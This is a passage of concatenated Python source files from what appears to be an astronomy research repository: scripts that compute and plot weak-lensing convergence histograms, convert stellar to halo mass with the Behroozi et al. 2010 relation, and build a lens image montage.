w_massoverr= %.4e w_mass2overr= %.4e w_mass3overr= %.4e w_mass2overrrms= %.4e w_mass3overrrms= %.4e w_zmassoverr= %.4e w_zmass2overr= %.4e \\n' % (str(sys.argv[1])[0:len(str(sys.argv[1]))-4], centersx[i][j], centersy[i][j], B1608_tab_sim_gal[i][j][k], B1608_tab_sim_oneoverr[i][j][k], B1608_tab_sim_zweight[i][j][k], B1608_tab_sim_mass[i][j][k], B1608_tab_sim_mass2[i][j][k], B1608_tab_sim_mass2rms[i][j][k], B1608_tab_sim_mass3[i][j][k], B1608_tab_sim_mass3rms[i][j][k], B1608_tab_sim_zoverr[i][j][k], B1608_tab_sim_massoverr[i][j][k], B1608_tab_sim_mass2overr[i][j][k], B1608_tab_sim_mass3overr[i][j][k], B1608_tab_sim_mass2overrrms[i][j][k], B1608_tab_sim_mass3overrrms[i][j][k], B1608_tab_sim_zmassoverr[i][j][k], B1608_tab_sim_zmass2overr[i][j][k]))\ns.close()\nf.close()\n#if str(sys.argv[8]) == \"samp\":\ng.close()\n#if str(sys.argv[8]) == \"tab\":\nh.close()\n\n\nprint(\"Total time forB1608_sim: --- %s seconds ---\" % (time.time() - start_time))\n\nprint 'Done!'\n " }, { "alpha_fraction": 0.584221601486206, "alphanum_fraction": 0.6616601943969727, "avg_line_length": 52.379310607910156, "blob_id": "2385bbce1d986f7a240a4c021ae1b728eec8f495", "content_id": "eb85234bdf3b11e16984cc13dfbd5d701f2b8c5d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12384, "license_type": "no_license", "max_line_length": 231, "num_lines": 232, "path": "/python/plot_utilities/plotkappa_handpickedpaper0408.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Plots the equivalent of Figure 13 in Rusu et al. 2017\n\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport scipy as sp\nfrom scipy.stats import norm\nimport numpy as np\n\nmin_kappa = -0.20\nmax_kappa = 1\nmin_kappa_plot = -0.1\nmax_kappa_plot = 0.15\nbin_stat = 2000\nhalfwidth = (max_kappa - min_kappa) / (bin_stat * 2.0)\n\n#root = \"/Users/cerusu/Dropbox/\"\n#root = \"/Volumes/LaCieSubaru/kapparesults/\"\nroot = \"/Users/cerusu/Dropbox/Davis_work/code/0408/\"\n\ndef statistics(kappa_all_,bin_stat_,min_kappa_,max_kappa_):\n a, kappa_values = np.histogram([0], bins = bin_stat_, range=(min_kappa_,max_kappa_)) # create an empty histogram of the correct shape\n\n sum = np.sum(kappa_all_)\n #meanX = np.sum(kappa_counts * (kappa_values[:-1] + halfwidth)) / sum\n #meanX2 = np.sum(kappa_counts * (kappa_values[:-1] + halfwidth) ** 2) / sum\n #std = np.sqrt(meanX2 - meanX**2)\n\n med = 0\n i = 0\n ok = False\n while (med <= sum/2.0) and (ok == False):\n med = med + kappa_all_[i]\n if med > sum/2.0:\n median = kappa_values[i] + halfwidth\n ok = True\n if med == sum/2.0:\n median = kappa_values[i] + 2 * halfwidth\n ok = True\n i = i + 1\n\n std = 0\n ok = False\n i = 0\n while (std <= sum * 0.16) and (ok == False):\n std = std + kappa_all_[i]\n if std > sum * 0.16:\n std1_ = kappa_values[i] + halfwidth\n ok = True\n if med == sum*0.16:\n std1_ = kappa_values[i] + 2 * halfwidth\n ok = True\n i = i + 1\n\n std = 0\n ok = False\n i = 0\n while (std <= sum*0.84) and (ok == False):\n std = std + kappa_all_[i]\n if std > sum*0.84:\n std1 = kappa_values[i] + halfwidth\n ok = True\n if med == sum*0.84:\n std1 = kappa_values[i] + 2 * halfwidth\n ok = True\n i = i + 1\n\n stddev = (std1 - std1_) / 2\n\n return median,stddev,kappa_values\n\ndef smooth(x,window_len=11,window='hanning'):\n \"\"\"smooth the data using a window with requested size.\n\n This method is based on the convolution of a scaled window with the signal.\n The signal is prepared by introducing reflected copies of the signal\n (with the window size) in both ends so that transient parts are minimized\n in the begining and end part of the output signal.\n\n input:\n x: the input signal\n window_len: the dimension of the smoothing window; should be an odd integer\n window: the type of window from 'flat', 'hanning', 'hamming', 'bartlett', 'blackman'\n flat window will produce a moving average smoothing.\n\n output: the smoothed signal\n\n see also:\n\n numpy.hanning, numpy.hamming, numpy.bartlett, numpy.blackman, numpy.convolve\n scipy.signal.lfilter\n\n TODO: the window parameter could be the window itself if an array instead of a string\n NOTE: length(output) != length(input), to correct this: return y[(window_len/2-1):-(window_len/2)] instead of just y.\n \"\"\"\n\n if x.ndim != 1:\n raise ValueError, \"smooth only accepts 1 dimension arrays.\"\n if not window in ['flat', 'hanning', 'hamming', 'bartlett', 'blackman']:\n raise ValueError, \"Window is on of 'flat', 'hanning', 'hamming', 'bartlett', 'blackman'\"\n if x.size < window_len:\n raise ValueError, \"Input vector needs to be bigger than window size.\"\n\n if window_len<3:\n return x\n s=np.r_[x[window_len-1:0:-1],x,x[-2:-window_len-1:-1]]\n if window == 'flat': #moving average\n w=np.ones(window_len,'d')\n else:\n w=eval('np.'+window+'(window_len)')\n y=np.convolve(w/w.sum(),s,mode='valid')\n return y\n\nplt.clf()\n\nkappa_0 = np.loadtxt(\"%skappahistallLOS_plane30.cat\" % root, usecols=[0], unpack=True)\nmedian0,stddev0,kappa_values = statistics(kappa_0,bin_stat,min_kappa,max_kappa)\nkappa_0 = kappa_0 / np.sum(kappa_0 * np.abs((kappa_values[:-1]+halfwidth)))\n\n\nkappa_11 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_45_gal_45_oneoverr_22.5_med_increments2_2_emptymsk.cat\" % root, usecols=[0], unpack=True)\nmedian11,stddev11,kappa_values = statistics(kappa_11,bin_stat,min_kappa,max_kappa)\nkappa_11 = kappa_11 / np.sum(kappa_11 * np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_12 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_45_gal_45_zoverr_22.5_med_increments2_2_emptymsk.cat\" % root, usecols=[0], unpack=True)\nmedian12,stddev12,kappa_values = statistics(kappa_12,bin_stat,min_kappa,max_kappa)\nkappa_12 = kappa_12 / np.sum(kappa_12 * np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_17 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_120_gal_120_oneoverr_22.5_med_increments2_2_emptymsk.cat\" % root, usecols=[0], unpack=True)\nmedian17,stddev17,kappa_values = statistics(kappa_17,bin_stat,min_kappa,max_kappa)\nkappa_17 = kappa_17 / np.sum(kappa_17 * np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_18 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_120_gal_120_oneoverr_45_gal_45_oneoverr_22.5_med_increments2_2_2_2_emptymsk.cat\" % root, usecols=[0], unpack=True)\nmedian18,stddev18,kappa_values = statistics(kappa_18,bin_stat,min_kappa,max_kappa)\nkappa_18 = kappa_18 / np.sum(kappa_18 * np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_19 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_120_gal_120_oneoverr_45_gal_45_zoverr_22.5_med_increments2_2_2_2_emptymsk.cat\" % root, usecols=[0], unpack=True)\nmedian19,stddev19,kappa_values = statistics(kappa_19,bin_stat,min_kappa,max_kappa)\nkappa_19 = kappa_19 / np.sum(kappa_19 * np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_20 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_120_gal_120_zoverr_22.5_med_increments2_2_emptymsk.cat\" % root, usecols=[0], unpack=True)\nmedian20,stddev20,kappa_values = statistics(kappa_20,bin_stat,min_kappa,max_kappa)\nkappa_20 = kappa_20 / np.sum(kappa_20 * np.abs((kappa_values[:-1]+halfwidth)))\n\n\nkappa_31 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removelensgrouphandpicked_zgap-1.0_-1.0_fiducial_45_gal_45_oneoverr_22.5_med_increments2_2_emptymsk.cat\" % root, usecols=[0], unpack=True)\nmedian31,stddev31,kappa_values = statistics(kappa_31,bin_stat,min_kappa,max_kappa)\nkappa_31 = kappa_31 / np.sum(kappa_31 * np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_32 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removelensgrouphandpicked_zgap-1.0_-1.0_fiducial_45_gal_45_zoverr_22.5_med_increments2_2_emptymsk.cat\" % root, usecols=[0], unpack=True)\nmedian32,stddev32,kappa_values = statistics(kappa_32,bin_stat,min_kappa,max_kappa)\nkappa_32 = kappa_32 / np.sum(kappa_32 * np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_37 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removelensgrouphandpicked_zgap-1.0_-1.0_fiducial_120_gal_120_oneoverr_22.5_med_increments2_2_emptymsk.cat\" % root, usecols=[0], unpack=True)\nmedian37,stddev37,kappa_values = statistics(kappa_37,bin_stat,min_kappa,max_kappa)\nkappa_37 = kappa_37 / np.sum(kappa_37 * np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_38 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removelensgrouphandpicked_zgap-1.0_-1.0_fiducial_120_gal_120_oneoverr_45_gal_45_oneoverr_22.5_med_increments2_2_2_2_emptymsk.cat\" % root, usecols=[0], unpack=True)\nmedian38,stddev38,kappa_values = statistics(kappa_38,bin_stat,min_kappa,max_kappa)\nkappa_38 = kappa_38 / np.sum(kappa_38 * np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_39 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removelensgrouphandpicked_zgap-1.0_-1.0_fiducial_120_gal_120_oneoverr_45_gal_45_zoverr_22.5_med_increments2_2_2_2_emptymsk.cat\" % root, usecols=[0], unpack=True)\nmedian39,stddev39,kappa_values = statistics(kappa_39,bin_stat,min_kappa,max_kappa)\nkappa_39 = kappa_39 / np.sum(kappa_39 * np.abs((kappa_values[:-1]+halfwidth)))\n\nkappa_40 = np.loadtxt(\"%skappahist_0408_measured_5innermask_nobeta_removelensgrouphandpicked_zgap-1.0_-1.0_fiducial_120_gal_120_zoverr_22.5_med_increments2_2_emptymsk.cat\" % root, usecols=[0], unpack=True)\nmedian40,stddev40,kappa_values = statistics(kappa_40,bin_stat,min_kappa,max_kappa)\nkappa_40 = kappa_40 / np.sum(kappa_40 * np.abs((kappa_values[:-1]+halfwidth)))\n\n#s = \"%.3f %.3f LOS=%d\" % (median,std1,LOS)\ns0 = \"%.3f %.3f\" % (median0,stddev0)\n#s1 = \"%.3f %.3f\" % (median1,stddev1)\n#s2 = \"%.3f %.3f\" % (median2,stddev2)\n#s3 = \"%.3f %.3f\" % (median3,stddev3)\n#s4 = \"%.3f %.3f\" % (median4,stddev4)\n#s5 = \"%.3f %.3f\" % (median5,stddev5)\n#s6 = \"%.3f %.3f\" % (median6,stddev6)\n#s7 = \"%.3f %.3f\" % (median7,stddev7)\n#s8 = \"%.3f %.3f\" % (median8,stddev8)\n#s9 = \"%.3f %.3f\" % (median9,stddev9)\n#s10 = \"%.3f %.3f\" % (median10,stddev10)\ns11 = \"%.3f %.3f\" % (median11,stddev11)\ns12 = \"%.3f %.3f\" % (median12,stddev12)\n#s13 = \"%.3f %.3f\" % (median13,stddev13)\n#s14 = \"%.3f %.3f\" % (median14,stddev14)\n#s15 = \"%.3f %.3f\" % (median15,stddev15)\n#s16 = \"%.3f %.3f\" % (median16,stddev16)\ns17 = \"%.3f %.3f\" % (median17,stddev17)\ns18 = \"%.3f %.3f\" % (median18,stddev18)\ns19 = \"%.3f %.3f\" % (median19,stddev19)\ns20 = \"%.3f %.3f\" % (median20,stddev20)\ns31 = \"%.3f %.3f\" % (median31,stddev31)\ns32 = \"%.3f %.3f\" % (median32,stddev32)\ns37 = \"%.3f %.3f\" % (median37,stddev37)\ns38 = \"%.3f %.3f\" % (median38,stddev38)\ns39 = \"%.3f %.3f\" % (median39,stddev39)\ns40 = \"%.3f %.3f\" % (median40,stddev40)\n\nplt.subplot(1,1,1)\nax = plt.subplot(1,1,1)\nax.tick_params(labelsize=14)\nplt.xlim(min_kappa_plot, max_kappa_plot)\nplt.ylim(0, 0.25)\n\nwinlen = 12\n#smooth(kappa_3,winlen,'flat')\n#smooth(kappa_3,winlen,'hanning')\n#smooth(kappa_3,winlen,'hamming')\n#smooth(kappa_3,winlen,'bartlett')\n#smooth(kappa_3,winlen,'blackman')\n\nplt.plot(kappa_values[:-1],smooth(kappa_0,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='k', linewidth=1, linestyle='-', label ='%s; all LOS' %s0)\n\nplt.plot(kappa_values[:-1],smooth(kappa_11,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='b', linewidth=1, linestyle='-', label ='%s; $45: 1,1/r$; w/ group' %s11)\nplt.plot(kappa_values[:-1],smooth(kappa_12,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='g', linewidth=1, linestyle='-', label ='%s; $45: 1,z/r$; w/ group' %s12)\nplt.plot(kappa_values[:-1],smooth(kappa_17,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='r', linewidth=1, linestyle='-', label ='%s; $120: 1,1/r$; w/ group' %s17)\nplt.plot(kappa_values[:-1],smooth(kappa_20,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='c', linewidth=1, linestyle='-', label ='%s; $120: 1,z/r$; w/ group' %s20)\nplt.plot(kappa_values[:-1],smooth(kappa_18,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='m', linewidth=1, linestyle='-', label ='%s; $120: 1,1/r; 45:1,1/r$; w/ group' %s18)\nplt.plot(kappa_values[:-1],smooth(kappa_19,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='orange', linewidth=1, linestyle='-', label ='%s; $120: 1,1/r; 45:1,z/r$; w/ group' %s19)\n\nplt.plot(kappa_values[:-1],smooth(kappa_31,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='b', linewidth=1, linestyle=':', label ='%s; $45: 1,1/r$; w/o group' %s31)\nplt.plot(kappa_values[:-1],smooth(kappa_32,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='g', linewidth=1, linestyle=':', label ='%s; $45: 1,z/r$; w/o group' %s32)\nplt.plot(kappa_values[:-1],smooth(kappa_37,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='r', linewidth=1, linestyle=':', label ='%s; $120: 1,1/r$; w/o group' %s37)\nplt.plot(kappa_values[:-1],smooth(kappa_40,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='c', linewidth=1, linestyle=':', label ='%s; $120: 1,z/r$; w/o group' %s40)\nplt.plot(kappa_values[:-1],smooth(kappa_38,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='m', linewidth=1, linestyle=':', label ='%s; $120: 1,1/r; 45:1,1/r$; w/o group' %s38)\nplt.plot(kappa_values[:-1],smooth(kappa_39,winlen,'flat')[(winlen/2-1):-(winlen/2)],color='orange', linewidth=1, linestyle=':', label ='%s; $120: 1,1/r; 45:1,z/r$; w/o group' %s39)\n\nplt.xlabel(r'$\\kappa$', fontsize=14)\nplt.ylabel(r'normalized counts', fontsize=14)\nplt.legend(loc=\"upper right\",fontsize=8)\nplt.title(\"P($\\kappa$) for DES J0408-5354 using De Lucia & Blaizot (2007) galaxies\",fontsize=14)\nplt.savefig('%skappahist_handpicked_groupornot.pdf' % root, dpi=250, bbox_inches='tight')\n" }, { "alpha_fraction": 0.6334404945373535, "alphanum_fraction": 0.6713826656341553, "avg_line_length": 36.02381134033203, "blob_id": "d58ee3c76fe061633cfad6860bdb100b7b559677", "content_id": "ba00e821cdb773adf8826d61c42e10964bcaab9d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1555, "license_type": "no_license", "max_line_length": 165, "num_lines": 42, "path": "/python/catalogue_utilities/inferkappaallLOS.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Run as python inferkappaallLOS.py\n# Computes kappa for all LOS in the MS, producing a histogram in the same way that the other inferkappa codes do.\n\nimport sys\nimport os\nfrom os import system\nimport scipy as sp\nfrom scipy.stats import norm\nimport numpy as np\nimport time\nimport fitsio\n\nstart_time=time.time()\n\nroot = '/lfs08/rusucs/0408/MSwghtratios/'\noutput = '/lfs08/rusucs/0408/MSkapparesults/kappahistallLOS_plane30.cat'\n\nbin_stat = 2000\nmin_kappa = -0.20\nmax_kappa = 1\n\nprint \"Reading...\"\nfor j in range(8):\n for i in range(8):\n file = \"%snobeta30measuredmedinject_griz_lens_0408_GGL_los_8_%s_%s_22.5_45_5arcsecinner_gap_-1.0_-1.0.fits\" % (root,str(j),str(i))\n f = fitsio.FITS(file)\n print f # I need to print it, or f.hdu_list will not read\n ext = len(f.hdu_list)\n #if (i!=5) or (j!=5): # because one input field is missing\n #kappa_ = np.loadtxt(\"%snobeta35measuredmedinject_ugriz_WFI2033_GGL_los_8_%s_%s_45_5arcsecinnermsk.cat\" % (root,str(j),str(i)), usecols=[1], unpack=True)\n if (i == 0) and (j == 0): kappa = fitsio.read(file, columns=[1]).astype(float)\n else: kappa = np.append(kappa,fitsio.read(file, columns=[1]).astype(float))\n print j\n\nkappa_hist = np.histogram(kappa, bins = bin_stat, range=(min_kappa,max_kappa))[0].astype(float)\nkappa_hist = kappa_hist/np.sum(kappa_hist)\nhead = \"LOS: \"+ str(len(kappa))\nnp.savetxt(output,kappa_hist,fmt='%s',delimiter='\\t',newline='\\n',header=head)\n\nprint(\" Total time --- %s seconds ---\" % (time.time() - start_time))\n\nprint 'Done!'\n" }, { "alpha_fraction": 0.5045965313911438, "alphanum_fraction": 0.6082737445831299, "avg_line_length": 23.172840118408203, "blob_id": "45276672a33ce7ba35b23ad2a8f933970c8939ae", "content_id": "de9812fa029705ccfbc304e7f3752dd1da52a2ef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1958, "license_type": "no_license", "max_line_length": 204, "num_lines": 81, "path": "/python/catalogue_utilities/MstartoMhalo.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# the code transforms Mstar to Mhalo using Behroozi et al. 2010. I used this to test if the MS De Lucia, Guo or Bower galaxies can be used to recover Mhalo from Mstar\n\nimport numpy as np\nimport sys\n\nfile = \"/Users/perseus/Desktop/GGL_los_8_0_0_0_0_N_4096_ang_4_Guo_galaxies_on_plane_27_to_63.images.txt\"\nfileout = file[:-4] + \"plot.txt\"\n\nzspec = 5\nmhalo = 9\nmstar = 11\n\ndata = np.loadtxt(file,usecols=[zspec,mhalo,mstar],unpack=True)\n\nzspec = 0\nmhalo = 1\nmstar = 2\n\ndata[mstar] = np.log10(data[mstar])\ndata[mhalo] = np.log10(data[mhalo])\n\n# Behroozi et al 2010 parameters for z < 1:\nM10_ = 12.35\nM1a_ = 0.28\nMs00_ = 10.72\nMs0a_ = 0.55\nb0_ = 0.44\nba_ = 0.18\nd0_ = 0.57\nda_ = 0.17\ng0_ = 1.56\nga_ = 2.51\n# z >= 1:\nM10 = 12.27\nM1a = -0.84\nMs00 = 11.09\nMs0a = 0.56\nb0 = 0.65\nba = 0.31\nd0 = 0.56\nda = -0.12\ng0 = 1.12\nga = -0.53\n\ndatahalo = np.zeros(len(data[zspec]))\n\na = 1 / (1 + data[zspec][data[zspec] <= 1])\nlogM1a = M10_ + M1a_ * (a - 1)\nlogMs0a = Ms00_ + Ms0a_ * (a - 1)\nnotlogMs0a = 10 ** logMs0a\nb = b0_ + ba_ * (a - 1)\nd = d0_ + da_ * (a - 1)\ng = g0_ + ga_ * (a - 1)\ndatahalo[data[zspec] <= 1] = logM1a + b * (data[mstar][data[zspec] <= 1] - logMs0a) + ((10 ** data[mstar][data[zspec] <= 1]/notlogMs0a)**d)/(1+(10 ** data[mstar][data[zspec] <= 1]/notlogMs0a)**(-g)) - 1/2\ndel logM1a\ndel logMs0a\ndel notlogMs0a\ndel b\ndel d\ndel g\n\na = 1 / (1 + data[zspec][data[zspec] > 1])\nlogM1a = M10 + M1a * (a-1)\nlogMs0a = Ms00 + Ms0a * (a-1)\nnotlogMs0a = 10 ** logMs0a\nb = b0 + ba * (a-1)\nd = d0 + da * (a-1)\ng = g0 + ga * (a-1)\ndatahalo[data[zspec] > 1] = logM1a + b * (data[mstar][data[zspec] > 1] - logMs0a) + ((10 ** data[mstar][data[zspec] > 1]/notlogMs0a)**d)/(1+(10 ** data[mstar][data[zspec] > 1]/notlogMs0a)**(-g)) - 1/2\ndel logM1a\ndel logMs0a\ndel notlogMs0a\ndel b\ndel d\ndel g\n\ndataout = np.c_[data[mhalo],data[mstar],datahalo]\nhead = \"M_Halo \\t M_Stellar \\t M_Halo_Behroozi\"\nnp.savetxt(fileout,dataout,header=head,fmt='%.3e \\t %.3e \\t %.3e')\n\nprint ' Done!'\n" }, { "alpha_fraction": 0.6740226149559021, "alphanum_fraction": 0.7238922715187073, "avg_line_length": 58.94791793823242, "blob_id": "f2e002182ee6931c96b5a76ffbbfc82633ee4c7d", "content_id": "76ca16c86695191b7fef1ad479f4d9a56fab1830", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5755, "license_type": "no_license", "max_line_length": 287, "num_lines": 96, "path": "/python/plot_utilities/image_mashup.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# creates the lens montage in Rusu et al. 2018a\n\nfrom astropy.io import fits\n#from matplotlib.colors import LogNorm\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom mpl_toolkits.axes_grid1.inset_locator import InsetPosition\nfrom astropy.convolution import Gaussian2DKernel, convolve\n\nplt.clf()\n\nlim = 2 # sigma limits for plot range\nkernel = Gaussian2DKernel(stddev=2)\n\n# the simple way to center the images properly is to do a match > wcs in ds9 and record the matching central pixel coordinates in each image; python does not allow to non-integer margins, so do as below:\ncenter_g=[71,35]\ncenter_r=[71,35]\ncenter_i=[71,35]\ncenter_z=[71,35]\ncenter_y=[71,35]\ncenter_Y=[54,26]\ncenter_J=[54,27]\ncenter_K=[54,26]\nside_g = 60 # 15 arcsec\nside_r = 60\nside_i = 60\nside_z = 60\nside_y = 60\nside_Y = 44\nside_J = 44\nside_K = 44\n\nimage_g = fits.getdata(\"/Users/cerusu/OneDrive - Subaru Telescope/2M1134-2103/final_g/nolens_analPSF_subtract.fits\")\nimage_r = fits.getdata(\"/Users/cerusu/OneDrive - Subaru Telescope/2M1134-2103/final_r/nolens_correctPSF_subtract.fits\")\nimage_i = fits.getdata(\"/Users/cerusu/OneDrive - Subaru Telescope/2M1134-2103/final_i/nolens_correctPSF_subtract.fits\")\nimage_z = fits.getdata(\"/Users/cerusu/OneDrive - Subaru Telescope/2M1134-2103/final_z/nolens_correctPSF_subtract.fits\")\nimage_y = fits.getdata(\"/Users/cerusu/OneDrive - Subaru Telescope/2M1134-2103/final_y/nolens_analPSF_subtract.fits\")\nimage_Y = fits.getdata(\"/Users/cerusu/OneDrive - Subaru Telescope/2M1134-2103/final_VISTAY/nolens_analPSF_subtract.fits\")\nimage_J = fits.getdata(\"/Users/cerusu/OneDrive - Subaru Telescope/2M1134-2103/final_J/lens_correctPSF_subtract.fits\")\nimage_K = fits.getdata(\"/Users/cerusu/OneDrive - Subaru Telescope/2M1134-2103/final_K/lens_correctPSF_subtract.fits\")\n\nnoise_g = fits.getdata(\"/Users/cerusu/OneDrive - Subaru Telescope/2M1134-2103/images/g_sigma_small.fits\")\nnoise_r = fits.getdata(\"/Users/cerusu/OneDrive - Subaru Telescope/2M1134-2103/images/r_sigma_small.fits\")\nnoise_i = fits.getdata(\"/Users/cerusu/OneDrive - Subaru Telescope/2M1134-2103/images/i_sigma_small.fits\")\nnoise_z = fits.getdata(\"/Users/cerusu/OneDrive - Subaru Telescope/2M1134-2103/images/z_sigma_small.fits\")\nnoise_y = fits.getdata(\"/Users/cerusu/OneDrive - Subaru Telescope/2M1134-2103/images/y_sigma_small.fits\")\nnoise_Y = fits.getdata(\"/Users/cerusu/OneDrive - Subaru Telescope/2M1134-2103/images/VISTAmatch_Y_sigma_small.fits\")\nnoise_J = fits.getdata(\"/Users/cerusu/OneDrive - Subaru Telescope/2M1134-2103/images/VISTAmatch_J_sigma_small.fits\")\nnoise_K = fits.getdata(\"/Users/cerusu/OneDrive - Subaru Telescope/2M1134-2103/images/VISTAmatch_Ks_sigma_small.fits\")\n\ncat_g = np.loadtxt(\"astrom_g.cat\",unpack=True)\ncat_r = np.loadtxt(\"astrom_r.cat\",unpack=True)\ncat_i = np.loadtxt(\"astrom_i.cat\",unpack=True)\ncat_z = np.loadtxt(\"astrom_z.cat\",unpack=True)\ncat_y = np.loadtxt(\"astrom_y.cat\",unpack=True)\ncat_Y = np.loadtxt(\"astrom_YVISTA.cat\",unpack=True)\ncat_J = np.loadtxt(\"astrom_J.cat\",unpack=True)\ncat_K = np.loadtxt(\"astrom_K.cat\",unpack=True)\n\n# I'm adding an extra column, in which I will load the colormap. Otherwise either there will be too much blank space or the color map will overlap the images. An alternative is to use ImageGrid, but that only works for images with exactly the same pixel size, which is not the case here.\nfig, axes = plt.subplots(nrows=2, ncols=5, gridspec_kw={\"width_ratios\":[1,1,1,1,0.05]},figsize=(4,2)) # setting the colorbar column to be narrow; each of the 2x5 subplots gets an axis\n# Unfortunately I couldn't find a way to make the margins of the plots touch perfectly. That is an interplay between figsize and subplots_adjust parameters\n\ndef imageplt(image,noise,center,side,cat,band,ax):\n #print np.std(image)\n image = image / noise # rescale pixel values so that the standard deviation is 1; this is in order to share one colorbar across images with different noise properties, and also so that I can have the colorbar in units of sigma\n image = convolve(image, kernel)\n global im\n im = ax.imshow(image[center[1]-int(side/2):center[1]+int(side/2),center[0]-int(side/2):center[0]+int(side/2)], cmap='gray', origin='lower', aspect='equal', vmin=-lim, vmax=lim)\n ax.text(side * 4.5/6, side * 5.0/6, band, size='10')\n ax.scatter(cat[0]-center[0]+int(side/2),cat[1]-center[1]+int(side/2),marker='*',s=5,facecolors='none', edgecolors='k')\n ax.set_xticks([])\n ax.set_yticks([])\n\ni = 0\nfor ax in axes.flat:\n if i == 0: imageplt(image_g,noise_g,center_g,side_g,cat_g,'g',ax)\n if i == 1: imageplt(image_r,noise_r,center_r,side_r,cat_r,'r',ax)\n if i == 2: imageplt(image_i,noise_i,center_i,side_i,cat_i,'i',ax)\n if i == 3: imageplt(image_z,noise_z,center_z,side_z,cat_z,'z',ax)\n if i == 4: ax.axis('off')\n if i == 5: imageplt(image_y,noise_y,center_y,side_y,cat_y,'y',ax)\n if i == 6: imageplt(image_Y,noise_Y,center_Y,side_Y,cat_Y,'Y',ax)\n if i == 7: imageplt(image_J,noise_J,center_J,side_J,cat_J,'J',ax)\n if i == 8: imageplt(image_K,noise_K,center_K,side_K,cat_K,'Ks',ax)\n i += 1\n\nip = InsetPosition(axes.flat[8], [1.05,0,0.05,2]) # allows me to set the position of the colorbar wherever I want, in this case right after the final subplot, extended across two rows\naxes.flat[9].set_axes_locator(ip)\n\ncbar=fig.colorbar(im, cax=axes.flat[9], ax=[axes.flat[0],axes.flat[1],axes.flat[2],axes.flat[3],axes.flat[5],axes.flat[6],axes.flat[7],axes.flat[8]],ticks=np.linspace(-lim,lim,2*lim+1))\ncbar.ax.tick_params(labelsize=6)\n#cbar.ax.set_yticklabels([str(x) for x in np.linspace(-lim,lim,2*lim+1)])\n\nplt.subplots_adjust(bottom=0, left=0, right=1, top=1, wspace=0, hspace=-0.02)\nplt.savefig('hostlens.eps', dpi=150, bbox_inches='tight')\n" }, { "alpha_fraction": 0.47946280241012573, "alphanum_fraction": 0.5683656930923462, "avg_line_length": 56.61538314819336, "blob_id": "d13c63e007d66ce551a8876badf89d3c9803d1f7", "content_id": "f7ff484b30064dff99a04cf104fa39982b8b54d2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12733, "license_type": "no_license", "max_line_length": 418, "num_lines": 221, "path": "/python/catalogue_utilities/mstarsampling_nobeta.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# run this in order to sample from P(Mstar,z) for the lens catalogue. It requires that the output files produced by photozsampling.py first be used as input for LePhare, and then combined with combinelephare_withredshift.py\n\nimport numpy as np\nimport scipy\nfrom scipy import stats\nimport sys\nimport os\nfrom os import system\n\n# Behroozi et al 2010 parameters for z < 1:\nM10_ = np.array([12.35,-0.16,+0.07])\nM1a_ = np.array([0.28,-0.97,+0.19])\nMs00_ = np.array([10.72,-0.29,+0.22])\nMs0a_ = np.array([0.55,-0.79,+0.18])\nb0_ = np.array([0.44,-0.06,+0.04])\nba_ = np.array([0.18,-0.34,+0.08])\nd0_ = np.array([0.57,-0.06,+0.15])\nda_ = np.array([0.17,-0.41,+0.42])\ng0_ = np.array([1.56,-0.38,+0.12])\nga_ = np.array([2.51,-1.83,+0.15])\n# z >= 1:\nM10 = np.array([12.27,-0.27,+0.59])\nM1a = np.array([-0.84,-0.58,+0.87])\nMs00 = np.array([11.09,-0.31,+0.54])\nMs0a = np.array([0.56,-0.44,+0.89])\nb0 = np.array([0.65,-0.20,+0.26])\nba = np.array([0.31,-0.47,+0.38])\nd0 = np.array([0.56,-0.29,+1.33])\nda = np.array([-0.12,-0.50,+0.76])\ng0 = np.array([1.12,-0.36,+7.47])\nga = 